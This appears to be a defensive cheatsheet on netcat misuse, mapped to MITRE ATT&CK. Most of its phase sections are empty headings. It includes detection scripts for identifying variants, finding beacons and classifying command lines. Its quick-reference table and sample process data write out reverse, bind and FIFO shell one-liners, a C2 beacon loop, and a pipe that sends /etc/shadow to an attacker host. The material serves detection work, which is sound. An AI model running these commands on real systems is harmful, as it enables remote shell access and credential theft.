Netcat: Attack & Detection Techniques

Netcat Weaponisation: Attack Techniques & Detection Cheatsheet

Overview

Netcat (nc) is a versatile networking utility that reads and writes data across network connections. Its legitimate uses include debugging, port scanning, and file transfers—but attackers weaponise it for reconnaissance, reverse shells, data exfiltration, and lateral movement. This guide covers offensive techniques mapped to MITRE ATT&CK tactics and comprehensive detection strategies.


Learning Workflow

Phase 1: Foundations — Netcat variants, syntax, and capabilities
Phase 2: Reconnaissance — Port scanning, banner grabbing, service enumeration
Phase 3: Initial Access — Bind shells, reverse shells, payload delivery
Phase 4: Execution — Command execution, script delivery, interactive shells
Phase 5: Persistence — Backdoors, scheduled tasks, service creation
Phase 6: Privilege Escalation — SUID exploitation, capability abuse
Phase 7: Defense Evasion — Encrypted channels, obfuscation, living-off-the-land
Phase 8: Credential Access — Credential harvesting, keylogging relay
Phase 9: Discovery — Network mapping, service discovery
Phase 10: Lateral Movement — Pivoting, proxying, relay attacks
Phase 11: Collection — Data staging, clipboard capture
Phase 12: Command & Control — C2 channels, beaconing
Phase 13: Exfiltration — Data theft, covert channels


Phase 1: Netcat Foundations

Netcat Variants

Variant | Description | Key Features
------- | ----------- | ------------
nc.traditional | Hobbit's original netcat 1.10 (1996), shipped by Debian as the netcat-traditional package | -e for execution (compile-time GAPING_SECURITY_HOLE, enabled in distro builds), -z scanning, -p source port
nc.openbsd | OpenBSD rewrite, the default nc on Debian/Ubuntu (netcat-openbsd) | No -e flag; -U Unix sockets, -x proxy support; older builds reject -l combined with -p (use nc -l 4444)
GNU netcat | Independent rewrite (netcat.sourceforge.net), a different code base from nc.traditional | Includes -e for execution
ncat | Nmap project's netcat | --ssl, --allow/--deny access control, --proxy, -e/--exec and --sh-exec, -k keep-open, UDP and SCTP
socat | General-purpose relay | Bidirectional by design, OPENSSL addresses, EXEC with a PTY, FORK for multiple clients
netcat / nc | Generic command name | Symlink to whichever variant the distribution chose (Debian: /etc/alternatives/nc); resolve it with readlink -f
busybox nc | Embedded and minimal systems | Minimal feature set; -l and -e only when BusyBox was built with NC_SERVER / NC_EXTRA
pwncat | Python post-exploitation handler (Caleb Stewart's pwncat-cs; cytopia's pwncat of the same name is a plain Python netcat) | Automatic shell upgrade, persistence and privesc modules built in
rustcat (rcat) | Rust implementation | Modern listener with command history and shell upgrade helpers

Core Syntax

Identifying Installed Variants
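The quickest way to tell variants apart on a host is to resolve the nc symlink and check whether the help text advertises -e or --exec. The script below is an added example for this section, not a script from the original page; it probes a fixed list of command names (nc, netcat, nc.openbsd, nc.traditional, ncat, busybox, rcat), assumes only POSIX sh, readlink and grep, and reports "not-installed" for anything missing, so it runs on any box:

```shell
#!/bin/sh
# Added example: report which netcat-family binaries are on PATH, what they
# resolve to, and whether they accept -e/--exec. Every probed tool may be
# absent; the script never fails because of a missing binary.

# Print "name<TAB>resolved-path<TAB>exec-support" for one command name.
probe_nc_variant() {
    name=$1
    path=$(command -v "$name" 2>/dev/null) || {
        printf '%s\tnot-installed\t-\n' "$name"
        return 0
    }
    # Generic names are usually symlinks (Debian: /etc/alternatives/nc); the
    # resolved path is the real answer. Fall back to the PATH entry if
    # readlink -f is unavailable.
    real=$(readlink -f "$path" 2>/dev/null || printf '%s' "$path")

    # Help text is enough to tell the variants apart: nc.traditional and GNU
    # netcat list "-e prog", ncat lists "-e, --exec" and "--sh-exec", OpenBSD
    # nc lists neither. BusyBox nc only shows -e when built with NC_EXTRA.
    case $name in
        busybox) usage_text=$("$path" nc -h </dev/null 2>&1 || true) ;;
        *)       usage_text=$("$path" -h    </dev/null 2>&1 || true) ;;
    esac
    if printf '%s\n' "$usage_text" \
        | grep -qE '(^|[[:space:]])-e[[:space:],]|--exec|--sh-exec'; then
        exec_support=yes
    else
        exec_support=no
    fi
    printf '%s\t%s\t%s\n' "$name" "$real" "$exec_support"
}

# Probe every common name; one output line per name, always seven lines.
identify_nc_variants() {
    for n in nc netcat nc.openbsd nc.traditional ncat busybox rcat; do
        probe_nc_variant "$n"
    done
}

identify_nc_variants
```

A "yes" in the third column is the finding that matters for bind and reverse shells: on a host where only nc.openbsd is present, an attacker has to fall back to the FIFO or bash /dev/tcp forms, which changes what you hunt for.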


Phase 2: Reconnaissance Detection

Attack Techniques

Port Scanning

Service Fingerprinting

Detection Strategies

Log Indicators

Network Detection

Host-Based Detection

Detection Script

Defensive Measures


Phase 3: Initial Access Detection

Attack Techniques

Bind Shell (Attacker Connects to Victim)

Reverse Shell (Victim Connects to Attacker)

Payload Delivery

Detection Strategies

Log Indicators

Network Detection

Process-Based Detection

Detection Script

Defensive Measures


Phase 4: Execution Detection

Attack Techniques

Remote Command Execution

Interactive Shell Upgrade

Staged Execution

Detection Strategies

Log Indicators

Process Detection

Network Detection

Detection Script


Phase 5: Persistence Detection

Attack Techniques

Cron-Based Persistence

Systemd Service Persistence

Init Script Persistence

Shell Profile Persistence

Binary Replacement Persistence

Detection Strategies

Log Indicators

File System Detection

Detection Script

Auditd Rules for Persistence


Phase 6: Privilege Escalation Detection

Attack Techniques

SUID Netcat Exploitation

Capability Abuse

Exploiting Privileged Processes

Sudo Misconfiguration Exploitation

Detection Strategies


Phase 7: Defense Evasion Detection

Attack Techniques

Process Name Obfuscation

Encrypted Channels

Traffic Obfuscation

Living Off The Land

Log Evasion

Detection Strategies

Obfuscation Detection

Encrypted Channel Detection

Detection Script


Phase 8: Credential Access Detection

Attack Techniques

Credential Harvesting Relay

Keylogger Relay

Password File Exfiltration

Memory Credential Dumping

Detection Strategies


Phase 9: Discovery Detection

Attack Techniques

Network Discovery

Internal Reconnaissance

Detection Strategies


Phase 10: Lateral Movement Detection

Attack Techniques

Pivoting Through Compromised Hosts

Port Forwarding

SOCKS Proxy Creation

File Transfer Laterally

Detection Strategies

Detection Script


Phase 11: Collection Detection

Attack Techniques

Data Staging

Clipboard Capture

Screen Capture

Archive Creation

Detection Strategies


Phase 12: Command & Control Detection

Attack Techniques

Basic C2 Channel

Resilient C2

Encrypted C2

Covert Channels

Detection Strategies

Beaconing Detection
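Beaconing shows up as connections from one host to one destination at nearly constant intervals, which is what the quick-reference loop (nc to the C2 every 300 seconds) produces. The script below is an added example for this section, not a script from the original page: it reads connection records of the form "epoch source destination dport" (the fields you would extract from conntrack, a firewall LOG line or a Zeek conn log; the sample records are constructed), computes the interval between successive connections per source/destination/port, and flags keys whose interval coefficient of variation is small. The thresholds (minimum 4 connections, CV at most 0.2) are assumptions to tune per network:

```shell
#!/bin/sh
# Added example: flag periodic (beaconing) connections in a time-ordered
# connection log. Input lines: "<epoch> <src> <dst> <dport>", as firewall or
# conntrack logs are naturally ordered. Output: one line per beaconing key.
detect_beacons() {
    min_count=${1:-4}   # fewer connections than this is not enough evidence
    max_cv=${2:-0.2}    # stddev/mean of the intervals; 0 is a perfect timer
    awk -v minc="$min_count" -v maxcv="$max_cv" '
    {
        key = $2 " " $3 ":" $4
        if (key in last) {
            d = $1 - last[key]            # interval since previous connection
            n[key]++
            sum[key] += d; sumsq[key] += d * d
        }
        last[key] = $1; seen[key]++
    }
    END {
        for (k in seen) {
            if (seen[k] < minc) continue
            mean = sum[k] / n[k]
            var  = sumsq[k] / n[k] - mean * mean
            if (var < 0) var = 0          # guard against rounding
            cv = (mean > 0) ? sqrt(var) / mean : 0
            if (cv <= maxcv)
                printf "%s count=%d interval=%.0fs cv=%.2f\n", k, seen[k], mean, cv
        }
    }'
}

# Constructed sample: a 300 s beacon with a few seconds of jitter to
# 203.0.113.10:4444, irregular HTTPS traffic, and a two-connection SSH pair
# that is below the minimum count.
sample_connections() {
    cat <<'EOF'
1000 10.0.0.23 203.0.113.10 4444
1005 10.0.0.23 93.184.216.34 443
1010 10.0.0.23 93.184.216.34 443
1130 10.0.0.23 93.184.216.34 443
1131 10.0.0.23 93.184.216.34 443
1302 10.0.0.23 203.0.113.10 4444
1400 10.0.0.23 93.184.216.34 443
1500 10.0.0.23 10.0.0.5 22
1599 10.0.0.23 203.0.113.10 4444
1800 10.0.0.23 10.0.0.5 22
1901 10.0.0.23 203.0.113.10 4444
2200 10.0.0.23 93.184.216.34 443
2203 10.0.0.23 203.0.113.10 4444
2498 10.0.0.23 203.0.113.10 4444
EOF
}

# Run the detector over the sample with the default thresholds.
beacon_demo() {
    sample_connections | detect_beacons 4 0.2
}

beacon_demo
```

Real implants add jitter on purpose; a CV threshold around 0.2 still catches a timer with a few percent of jitter, while heavily randomised sleeps need a longer window and a distribution test rather than this mean/stddev check.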

C2 Traffic Analysis

Detection Script


Phase 13: Exfiltration Detection

Attack Techniques

Direct File Exfiltration

Compressed Exfiltration

Chunked Exfiltration

Scheduled Exfiltration

Covert Channel Exfiltration

Detection Strategies

Network Monitoring

File Access Monitoring

Detection Script


Additional Attack Types

Port Knocking with Netcat

Man-in-the-Middle with Netcat

UDP Attacks


Comprehensive Detection Script


Quick Reference Card

Common Attack Patterns

Attack | Command | Detection
------ | ------- | ---------
Bind Shell | nc -lvp 4444 -e /bin/bash | Listener on an unusual port whose command line carries -e/--exec (nc.openbsd has no -e and older builds reject -l with -p)
Reverse Shell | nc <attacker> 4444 -e /bin/bash | Outbound connection to an unusual port; a shell whose parent is nc
FIFO Shell | mkfifo /tmp/f; cat /tmp/f|/bin/bash|nc <ip> 4444 >/tmp/f | Named pipes in /tmp, /dev/shm or /var/tmp; a shell with a pipe on stdin and a socket-connected nc sibling
Port Scan | nc -zv <target> 1-1024 | Burst of connection attempts to sequential ports from one source
Banner Grab | nc -v <target> 80 | Short connections that send nothing, or one bare request, then disconnect
File Exfil | cat file | nc <attacker> 4444 | Large outbound transfer to a non-web port
Relay/Pivot | nc -lvp 8888 | nc <target> 22 | nc processes joined by a pipe, each holding a socket (this form is one-way; a bidirectional relay needs a FIFO back-channel)
C2 Beacon | while true; do nc <c2> 4444 -e /bin/bash; sleep 300; done | Connections to the same host:port at fixed intervals
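The patterns in the table above can be matched mechanically against command lines. The script below is an added example, not one of the page's own detection scripts: it classifies netcat-family command lines from a process listing in the format produced by `ps -eo pid,ppid,user,args --no-headers` (or the EXECVE argv from auditd, joined into one line) into the table's categories. The sample listing is constructed; the pattern names and the "sh -c" wrapping, which is how the one-liners appear as a single process, are assumptions of the example:

```shell
#!/bin/sh
# Added example: classify netcat-family command lines into the attack patterns
# of the quick-reference table. Input: "pid ppid user args" lines on stdin.
# Output: "pid<TAB>pattern<TAB>args" for every netcat-family process.
classify_nc_cmdline() {
    awk '
    {
        pid = $1; args = ""
        for (i = 4; i <= NF; i++) args = args ((i > 4) ? " " : "") $i
        # Only netcat-family binaries, as a whole word at the start of the
        # command line, after a path component or after a pipe/separator.
        if (args !~ /(^|[ \/|;&])(nc|ncat|netcat|nc\.openbsd|nc\.traditional)( |$)/) next

        listen   = (args ~ /(^| )-[a-zA-Z]*l[a-zA-Z]*( |$)|--listen/)
        exec_    = (args ~ /(^| )-e |--exec|--sh-exec/)
        scan     = (args ~ /(^| )-[a-zA-Z]*z[a-zA-Z]*( |$)/)
        pipe_in  = (args ~ /\| *(nc|ncat|netcat)( |$)/)          # something | nc
        pipe_out = (args ~ /(^|[ \/])(nc|ncat|netcat)[^|]*\|/)    # nc ... | something
        # FIFO shell: mkfifo, or "cat <file> | ... >same file" without it
        fifo     = (args ~ /mkfifo/ || (args ~ /cat \/[^ ]+ *\|/ && args ~ />\/[^ ]+$/))
        loop     = (args ~ /while / && args ~ /sleep /)

        # Most specific first: a beacon loop also contains -e, a relay also
        # contains -l, so order matters.
        tag = "client-connect"            # bare "nc host port": banner grab or
                                          # a shell driven by the parent
        if (loop)                         tag = "c2-beacon-loop"
        else if (fifo)                    tag = "fifo-shell"
        else if (listen && exec_)         tag = "bind-shell"
        else if (exec_)                   tag = "reverse-shell"
        else if (scan)                    tag = "port-scan"
        else if (pipe_in && pipe_out)     tag = "relay-pivot"
        else if (pipe_in)                 tag = "piped-exfil"
        else if (listen)                  tag = "listener"
        printf "%s\t%s\t%s\n", pid, tag, args
    }'
}

# Constructed sample process listing (pid ppid user args).
sample_process_list() {
    cat <<'EOF'
  812     1 root     /usr/bin/nc -lvp 4444 -e /bin/bash
 1204  1190 www-data nc 203.0.113.10 4444 -e /bin/sh
 1337  1336 www-data sh -c mkfifo /tmp/f; cat /tmp/f|/bin/bash|nc 203.0.113.10 4444 >/tmp/f
 1402  1401 alice    nc -zv 10.0.0.5 1-1024
 1510  1509 root     sh -c nc -lvp 8888 | nc 10.0.0.7 22
 1601  1600 bob      sh -c cat /etc/shadow | nc 203.0.113.10 4444
 1702  1701 root     sh -c while true; do nc 203.0.113.10 4444 -e /bin/bash; sleep 300; done
 1803  1802 alice    rsync -av /data backup:/data
 1904  1903 alice    nc -v 10.0.0.5 80
 2001     1 root     /usr/sbin/sshd -D
EOF
}

detect_nc_patterns() { sample_process_list | classify_nc_cmdline; }

# Pattern assigned to one pid of the sample (empty if the pid was not flagged).
tag_for_pid() { detect_nc_patterns | awk -F'\t' -v p="$1" '$1 == p { print $2 }'; }

detect_nc_patterns
```

A bare `nc host port` is ambiguous on its own: the same line is a banner grab or the network half of a reverse shell driven by a parent bash. Resolve it by looking at the parent's command line and at whether a shell shares a pipe with the nc process, which is what the process-tree and lsof commands in the detection table are for.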

Detection Commands

Task | Command
---- | -------
Find nc processes | pgrep -af '(^|/)(nc|ncat|netcat|socat)(\.openbsd|\.traditional)?( |$)' (a bare grep for "nc" also matches rsync, sync and the like)
Find listeners | ss -tulnp (TCP and UDP listeners with owning process; grepping for LISTEN would drop UDP sockets)
Find named pipes | find /tmp /dev/shm /var/tmp -type p
Shell network conn | lsof -nP -i | grep -E '^(sh|bash|dash) '
Audit nc execution | ausearch -c nc (needs an auditd execve rule; -c matches the command name as invoked, so also try ncat, socat and renamed copies)
Process tree | for p in $(pgrep -x nc); do pstree -sp "$p"; done (shows the ancestors, which pstree -p | grep nc omits)
Deleted binaries | ls -l /proc/[0-9]*/exe 2>/dev/null | grep deleted

Defensive Rules

Log Locations

Log | Content
--- | -------
/var/log/auth.log (RHEL family: /var/log/secure) | Authentication, sudo, PAM session events
/var/log/syslog (RHEL family: /var/log/messages) | General system events, cron job execution
/var/log/audit/audit.log | auditd events (execve, file watches, syscall rules)
/var/log/kern.log | Kernel messages, including iptables/nftables LOG output
journalctl | systemd journal (unit start/stop, services created for persistence)


MITRE ATT&CK Mapping

Tactic | Technique | Netcat Usage
------ | --------- | ------------
Reconnaissance | T1595 Active Scanning | nc -zv port sweeps of external ranges
Initial Access | Vector-dependent (e.g. T1190 Exploit Public-Facing Application) | nc bind/reverse shell as the delivered payload; the shell itself is T1059.004
Execution | T1059.004 Command and Scripting Interpreter: Unix Shell | -e /bin/bash, FIFO shells
Persistence | T1053.003 Scheduled Task/Job: Cron; T1543.002 Systemd Service; T1546.004 Unix Shell Configuration Modification | Cron, systemd and shell-profile entries that relaunch an nc reverse shell
Privilege Escalation | T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid | SUID nc binary spawning a root shell
Defense Evasion | T1036.003 Masquerading: Rename System Utilities; T1573 Encrypted Channel (C2 tactic) | Renamed nc binaries; ncat --ssl / socat OPENSSL
Credential Access | T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow | cat /etc/shadow | nc <attacker>
Discovery | T1046 Network Service Discovery; T1018 Remote System Discovery | Internal port scans, banner grabbing, host sweeps
Lateral Movement | T1570 Lateral Tool Transfer; pivot chains are T1090.001 Proxy: Internal Proxy (C2 tactic) | nc file push to the next host; relay/pivot chains
Collection | T1560.001 Archive Collected Data: Archive via Utility | tar/gzip piped into nc
Command & Control | T1571 Non-Standard Port; T1095 Non-Application Layer Protocol | Raw TCP C2 on 4444 and similar
Exfiltration | T1041 Exfiltration Over C2 Channel; T1048 Exfiltration Over Alternative Protocol | Files sent through the shell's own socket, or over a separate raw nc connection
